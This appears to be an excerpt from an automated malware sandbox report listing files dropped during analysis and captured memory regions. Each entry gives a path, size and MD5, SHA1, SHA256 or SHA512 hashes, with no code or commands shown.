d011f47924e480aa50a5b5a25becfbd889a3c321a88e9cefa12d215ac5b9464d58620113043b43de9cacfd7f1aa012152e15a021d1738ae5f9bc76527efc2dc0

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‌ \Common Files\Music\MeasureProtect.jpg

Filesize
670KB

MD5
82ada01a397e0b78e0e0bccc35476b8c

SHA1
4c6b57583e07caad4c22e3e5e78d75d9e00b7a09

SHA256
e24ed92e50254bf59919c3fcf25bf03cc0fc162878255891794df6cb58b15497

SHA512
c4ee8bd3e486b63d57dd038a58bf2cceed55f4bd4e25b6958f5a7630dbb19c0ed9e96fd72a1dc1459927fd3a141bdcc51d923d1663f0b8a89b53fdef44fb0bd1

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‌ \Common Files\Music\ReadExport.xls

Filesize
644KB

MD5
7b8f484f58bf0fa81c679c641843d3b8

SHA1
a639f54abf5536aa3c8accf86b90c2bdf9235518

SHA256
96425c8a5ebcdf1aa9331aafe9a566782a150eab0b12cdec543ddf52514df352

SHA512
381552a38dfd6a0baa1a28a72c013f491a34e96bea9432ba2ac6023b2d34a0ad7640d91305f4040e924102f1bbe98002d599e615a606e8c3f8f97ebc32183343

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‌ \Common Files\Music\WatchResolve.xlsx

Filesize
872KB

MD5
7fec23b722300cf16a31dec23fad915b

SHA1
8ca7e883121bcf6d81b013ebc2022d338fe8b584

SHA256
9eebfea4e68e4b61f197255fb9e3c25584a204cbf531695e213f62fcb2f0efc5

SHA512
4597a1ff0c9d3f8089956e32b5464114527572f4eebe6e8d86a63884372e5607279aece0073fecfd714715383a3c8f51ce6b87c18c692a6c89257d718f7f3c04

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‌ \Common Files\Pictures\My Wallpaper.jpg

Filesize
24KB

MD5
a51464e41d75b2aa2b00ca31ea2ce7eb

SHA1
5b94362ac6a23c5aba706e8bfd11a5d8bab6097d

SHA256
16d5506b6663085b1acd80644ffa5363c158e390da67ed31298b85ddf0ad353f

SHA512
b2a09d52c211e7100e3e68d88c13394c64f23bf2ec3ca25b109ffb1e1a96a054f0e0d25d2f2a0c2145616eabc88c51d63023cef5faa7b49129d020f67ab0b1ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‌ \Common Files\Pictures\SkipUse.png

Filesize
552KB

MD5
dc018c8a59c7b6f58f2f40fcd2fbc3b5

SHA1
be17b0ebca6d8c238645178809a501cb140ab1bc

SHA256
0ab6385d6c80962b8f68982a3f2839403aaaf660911d8a299aca6361afeb1d32

SHA512
e7ea043cfa9deb3352fee95c851f59f37f743c283e7690d205a4a498922c377fdf855588cfb8cb9fa2190ecc47c9178e74bb1bcd44aebb0b4b7a7386618251f7

Download Submit
C:\Users\Admin\Downloads\wtc.cmd

Filesize
1KB

MD5
b882b7c25a0b218852d38ed86a6d81b1

SHA1
23e3589db660308cfeef7c01ee95e850cf606987

SHA256
11fabb76c012ee924cc270f56cb2ddfd792fb53ddf3d4a504909107c74abf4fb

SHA512
7c26d635ad6c4a93dc5da23cd84a5bfa312ac7260f81d9392908572eb621890c2cc45ea5fc37eef5d16ab9717ef07bfc6d7ff63a000d49b2fc618bd44d3b12a0

Download Submit
C:\Users\Public\PublicProfile.ps1

Filesize
522B

MD5
3dbaab581dbdc2c6ee5c229c51bc5a11

SHA1
a929a8e2af7d8665e18b726a9e57525a22d1f106

SHA256
1c5909314a588e982c9a97189b0ca390b451aa6c1394b873cbdcbbc603dcb1bb

SHA512
097f757028da31e8149925df666b63db969697f53a918253de7ab4df132fc2d156bcbb9c0b5131a0fa75cd36796c499768e6fce8ee3b96a36d59b656a29721bd

Download Submit
C:\l\winb.exe

Filesize
7.8MB

MD5
aa173ca6f04f4b75c13b89c45dbe2695

SHA1
2240de61b1bc93f077354341d24887bd06638ae3

SHA256
2be2a1b3619f29c42aec5140a7879961b431584e79181a185b7a10ce88c818f6

SHA512
633ae202a27c59d92bf15a05244043eaca3cda64bf7b1c82f85e689b267535d971c7b5c72ccaa6982e5a746daa224ee0108add71c49cd41d8ad2dee3e3d409f1

Download Submit
C:\l\winup.zip

Filesize
8.1MB

MD5
1e89e8f1986263f63f9ba62d47e3d80d

SHA1
2f28b894de4a6e9e68b573bd208f494533b6713e

SHA256
34a5ba9dfaf17b6917947b609f4fb157af6abaead9bfbacc98834fbdc225f38d

SHA512
3b2979bfb239ba6c9f6d23f59fd163387f116cf534aa64e7e9f03cba2858b8657426cdbd090dfbd5902a6f0ec9f70c3a384b327226a6479ca875c2786de2241e

Download Submit
C:\l\wts.exe

Filesize
993KB

MD5
ac8bdd834197b89f1c32acc853f22263

SHA1
66ec621dd0607b657a9d2e23fd13d36f33ca9310

SHA256
f52e1fc0b9916b143e15c656c01ea72ce73383e90eae87f4232c3ae962d44dd8

SHA512
879236678ceae9ea8e674a3ac6acb7e381a59d1162542419298d951f6ff16d87ad0fef964d6ff511c474c6402506d42ed8d1dca7793428c029d763778c2b93dd

Download Submit
memory/872-986-0x00000000006B0000-0x00000000006C0000-memory.dmp

Filesize
64KB

Download
memory/3000-778-0x000001E594040000-0x000001E594048000-memory.dmp

Filesize
32KB

Download
memory/4156-987-0x00007FFD86DD0000-0x00007FFD873BE000-memory.dmp

Filesize
5.9MB

Download
memory/4156-988-0x00007FFDA1DF0000-0x00007FFDA1E14000-memory.dmp

Filesize
144KB

Download
memory/4156-1237-0x00007FFDA1DF0000-0x00007FFDA1E14000-memory.dmp

Filesize
144KB

Download
memory/4156-989-0x00007FFDA6860000-0x00007FFDA686F000-memory.dmp

Filesize
60KB

Download
memory/4244-567-0x0000000000B80000-0x0000000000B90000-memory.dmp

Filesize
64KB

Download
memory/4244-568-0x0000000005200000-0x000000000529C000-memory.dmp

Filesize
624KB

Download
memory/4244-572-0x0000000005920000-0x000000000592A000-memory.dmp

Filesize
40KB

Download
memory/4244-571-0x00000000055B0000-0x0000000005642000-memory.dmp

Filesize
584KB

Download
memory/4244-570-0x00000000053A0000-0x0000000005406000-memory.dmp

Filesize
408KB

Download
memory/4244-569-0x0000000005950000-0x0000000005EF4000-memory.dmp

Filesize
5.6MB

Download
memory/4292-57-0x00007FFD88A50000-0x00007FFD89511000-memory.dmp

Filesize
10.8MB

Download
memory/4292-46-0x00007FFD88A53000-0x00007FFD88A55000-memory.dmp

Filesize
8KB

Download
memory/4292-61-0x00007FFD88A50000-0x00007FFD89511000-memory.dmp

Filesize
10.8MB

Download
memory/4292-58-0x00007FFD88A50000-0x00007FFD89511000-memory.dmp

Filesize
10.8MB

Download
memory/4292-53-0x0000017C23A40000-0x0000017C23A62000-memory.dmp

Filesize
136KB

Download
memory/4536-251-0x00007FFD85140000-0x00007FFD851F3000-memory.dmp

Filesize
716KB

Download
memory/4536-240-0x00007FFD86330000-0x00007FFD86364000-memory.dmp

Filesize
208KB

Download
memory/4536-531-0x00007FFD86B70000-0x00007FFD86B9B000-memory.dmp

Filesize
172KB

Download
memory/4536-229-0x00007FFD85FE0000-0x00007FFD8615F000-memory.dmp

Filesize
1.5MB

Download
memory/4536-239-0x00007FFD98350000-0x00007FFD9835D000-memory.dmp

Filesize
52KB

Download
memory/4536-242-0x00007FFD864B0000-0x00007FFD864C4000-memory.dmp

Filesize
80KB

Download
memory/4536-224-0x00007FFD86B70000-0x00007FFD86B9B000-memory.dmp

Filesize
172KB

Download
memory/4536-246-0x00007FFD8E5A0000-0x00007FFD8E5AD000-memory.dmp

Filesize
52KB

Download
memory/4536-245-0x00007FFD85F70000-0x00007FFD85F97000-memory.dmp

Filesize
156KB

Download
memory/4536-238-0x00007FFD85200000-0x00007FFD852CE000-memory.dmp

Filesize
824KB

Download
memory/4536-529-0x00007FFD8E810000-0x00007FFD8E81F000-memory.dmp

Filesize
60KB

Download
memory/4536-528-0x00007FFD86B50000-0x00007FFD86B69000-memory.dmp

Filesize
100KB

Download
memory/4536-237-0x00007FFD7F330000-0x00007FFD7F863000-memory.dmp

Filesize
5.2MB

Download
memory/4536-527-0x00007FFD85140000-0x00007FFD851F3000-memory.dmp

Filesize
716KB

Download
memory/4536-526-0x00007FFD8E5A0000-0x00007FFD8E5AD000-memory.dmp

Filesize
52KB

Download
memory/4536-180-0x00007FFD7DEA0000-0x00007FFD7E503000-memory.dmp

Filesize
6.4MB

Download
memory/4536-236-0x00007FFD7DEA0000-0x00007FFD7E503000-memory.dmp

Filesize
6.4MB

Download
memory/4536-397-0x00007FFD86B50000-0x00007FFD86B69000-memory.dmp

Filesize
100KB

Download
memory/4536-227-0x00007FFD863E0000-0x00007FFD86405000-memory.dmp

Filesize
148KB

Download
memory/4536-232-0x00007FFD86B30000-0x00007FFD86B49000-memory.dmp

Filesize
100KB

Download
memory/4536-420-0x00007FFD863E0000-0x00007FFD86405000-memory.dmp

Filesize
148KB

Download
memory/4536-530-0x00007FFD85F70000-0x00007FFD85F97000-memory.dmp

Filesize
156KB

Download
memory/4536-513-0x00007FFD7DEA0000-0x00007FFD7E503000-memory.dmp

Filesize
6.4MB

Download
memory/4536-187-0x00007FFD8E810000-0x00007FFD8E81F000-memory.dmp

Filesize
60KB

Download
memory/4536-186-0x00007FFD85F70000-0x00007FFD85F97000-memory.dmp

Filesize
156KB

Download
memory/4536-532-0x00007FFD98350000-0x00007FFD9835D000-memory.dmp

Filesize
52KB

Download
memory/4536-533-0x00007FFD863E0000-0x00007FFD86405000-memory.dmp

Filesize
148KB

Download
memory/4536-535-0x00007FFD86B30000-0x00007FFD86B49000-memory.dmp

Filesize
100KB

Download
memory/4536-536-0x00007FFD86330000-0x00007FFD86364000-memory.dmp

Filesize
208KB

Download
memory/4536-537-0x00007FFD7F330000-0x00007FFD7F863000-memory.dmp

Filesize
5.2MB

Download
memory/4536-538-0x00007FFD85200000-0x00007FFD852CE000-memory.dmp

Filesize
824KB

Download
memory/4536-534-0x00007FFD85FE0000-0x00007FFD8615F000-memory.dmp

Filesize
1.5MB

Download
memory/4536-225-0x00007FFD86B50000-0x00007FFD86B69000-memory.dmp

Filesize
100KB

Download
memory/4536-525-0x00007FFD864B0000-0x00007FFD864C4000-memory.dmp

Filesize
80KB

Download
memory/4536-492-0x00007FFD85140000-0x00007FFD851F3000-memory.dmp

Filesize
716KB

Download
memory/4536-484-0x00007FFD85FE0000-0x00007FFD8615F000-memory.dmp

Filesize
1.5MB

Download
memory/4536-478-0x00007FFD7DEA0000-0x00007FFD7E503000-memory.dmp

Filesize
6.4MB

Download
memory/4536-466-0x00007FFD86330000-0x00007FFD86364000-memory.dmp

Filesize
208KB

Download
memory/4536-464-0x00007FFD85200000-0x00007FFD852CE000-memory.dmp

Filesize
824KB

Download
memory/4536-463-0x00007FFD7F330000-0x00007FFD7F863000-memory.dmp

Filesize
5.2MB

Download
memory/4536-461-0x00007FFD85FE0000-0x00007FFD8615F000-memory.dmp

Filesize
1.5MB

Download
memory/4852-105-0x000001436F180000-0x000001436F18A000-memory.dmp

Filesize
40KB

Download
memory/4852-106-0x000001436F600000-0x000001436F612000-memory.dmp

Filesize
72KB

Download
memory/5660-642-0x00007FFDA6860000-0x00007FFDA686F000-memory.dmp

Filesize
60KB

Download
memory/5660-884-0x00007FFD8D500000-0x00007FFD8DB63000-memory.dmp

Filesize
6.4MB

Download
memory/5660-751-0x00007FFD9CA40000-0x00007FFD9CA65000-memory.dmp

Filesize
148KB

Download
memory/5660-650-0x00007FFD8CCB0000-0x00007FFD8CD63000-memory.dmp

Filesize
716KB

Download
memory/5660-649-0x00007FFDA1D60000-0x00007FFDA1D79000-memory.dmp

Filesize
100KB

Download
memory/5660-644-0x00007FFD9D9D0000-0x00007FFD9D9FB000-memory.dmp

Filesize
172KB

Download
memory/5660-645-0x00007FFD9D320000-0x00007FFD9D32D000-memory.dmp

Filesize
52KB

Download
memory/5660-643-0x00007FFD9D0C0000-0x00007FFD9D0D4000-memory.dmp

Filesize
80KB

Download
memory/5660-782-0x00007FFD8D380000-0x00007FFD8D4FF000-memory.dmp

Filesize
1.5MB

Download
memory/5660-637-0x00007FFD8D500000-0x00007FFD8DB63000-memory.dmp

Filesize
6.4MB

Download
memory/5660-639-0x000002D921E60000-0x000002D922393000-memory.dmp

Filesize
5.2MB

Download
memory/5660-640-0x00007FFD8CD70000-0x00007FFD8D2A3000-memory.dmp

Filesize
5.2MB

Download
memory/5660-641-0x00007FFDA1DF0000-0x00007FFDA1E17000-memory.dmp

Filesize
156KB

Download
memory/5660-638-0x00007FFD8D2B0000-0x00007FFD8D37E000-memory.dmp

Filesize
824KB

Download
memory/5660-636-0x00007FFD9C3C0000-0x00007FFD9C3F4000-memory.dmp

Filesize
208KB

Download
memory/5660-635-0x00007FFD9DA70000-0x00007FFD9DA7D000-memory.dmp

Filesize
52KB

Download
memory/5660-852-0x00007FFDA1020000-0x00007FFDA1039000-memory.dmp

Filesize
100KB

Download
memory/5660-855-0x00007FFD9DA70000-0x00007FFD9DA7D000-memory.dmp

Filesize
52KB

Download
memory/5660-858-0x00007FFD9C3C0000-0x00007FFD9C3F4000-memory.dmp

Filesize
208KB

Download
memory/5660-860-0x00007FFD8D2B0000-0x00007FFD8D37E000-memory.dmp

Filesize
824KB

Download
memory/5660-861-0x000002D921E60000-0x000002D922393000-memory.dmp

Filesize
5.2MB

Download
memory/5660-882-0x00007FFD8CD70000-0x00007FFD8D2A3000-memory.dmp

Filesize
5.2MB

Download
memory/5660-883-0x00007FFD9D0C0000-0x00007FFD9D0D4000-memory.dmp

Filesize
80KB

Download
memory/5660-890-0x00007FFD8D380000-0x00007FFD8D4FF000-memory.dmp

Filesize
1.5MB

Download
memory/5660-898-0x00007FFD8CCB0000-0x00007FFD8CD63000-memory.dmp

Filesize
716KB

Download
memory/5660-623-0x00007FFD8D500000-0x00007FFD8DB63000-memory.dmp

Filesize
6.4MB

Download
memory/5660-909-0x00007FFD8D500000-0x00007FFD8DB63000-memory.dmp

Filesize
6.4MB

Download
memory/5660-924-0x00007FFD8CD70000-0x00007FFD8D2A3000-memory.dmp

Filesize
5.2MB

Download
memory/5660-937-0x00007FFD8CCB0000-0x00007FFD8CD63000-memory.dmp

Filesize
716KB

Download
memory/5660-936-0x00007FFD9D320000-0x00007FFD9D32D000-memory.dmp

Filesize
52KB

Download
memory/5660-935-0x00007FFD9D0C0000-0x00007FFD9D0D4000-memory.dmp

Filesize
80KB

Download
memory/5660-934-0x00007FFD8D2B0000-0x00007FFD8D37E000-memory.dmp

Filesize
824KB

Download
memory/5660-933-0x00007FFD9C3C0000-0x00007FFD9C3F4000-memory.dmp

Filesize
208KB

Download
memory/5660-932-0x00007FFD9DA70000-0x00007FFD9DA7D000-memory.dmp

Filesize
52KB

Download
memory/5660-931-0x00007FFDA1020000-0x00007FFDA1039000-memory.dmp

Filesize
100KB

Download
memory/5660-930-0x00007FFD8D380000-0x00007FFD8D4FF000-memory.dmp

Filesize
1.5MB

Download
memory/5660-929-0x00007FFD9CA40000-0x00007FFD9CA65000-memory.dmp

Filesize
148KB

Download
memory/5660-928-0x00007FFDA1D60000-0x00007FFDA1D79000-memory.dmp

Filesize
100KB

Download
memory/5660-927-0x00007FFD9D9D0000-0x00007FFD9D9FB000-memory.dmp

Filesize
172KB

Download
memory/5660-926-0x00007FFDA6860000-0x00007FFDA686F000-memory.dmp

Filesize
60KB

Download
memory/5660-925-0x00007FFDA1DF0000-0x00007FFDA1E17000-memory.dmp

Filesize
156KB

Download
memory/5660-634-0x00007FFDA1020000-0x00007FFDA1039000-memory.dmp

Filesize
100KB

Download
memory/5660-633-0x00007FFD8D380000-0x00007FFD8D4FF000-memory.dmp

Filesize
1.5MB

Download
memory/5660-632-0x00007FFD9CA40000-0x00007FFD9CA65000-memory.dmp

Filesize
148KB

Download
memory/5660-631-0x00007FFDA1D60000-0x00007FFDA1D79000-memory.dmp

Filesize
100KB

Download
memory/5660-630-0x00007FFD9D9D0000-0x00007FFD9D9FB000-memory.dmp

Filesize
172KB

Download
memory/5660-625-0x00007FFDA6860000-0x00007FFDA686F000-memory.dmp

Filesize
60KB

Download
memory/5660-624-0x00007FFDA1DF0000-0x00007FFDA1E17000-memory.dmp

Filesize
156KB

Download
memory/6088-391-0x000001DB51B90000-0x000001DB51B98000-memory.dmp

Filesize
32KB

Download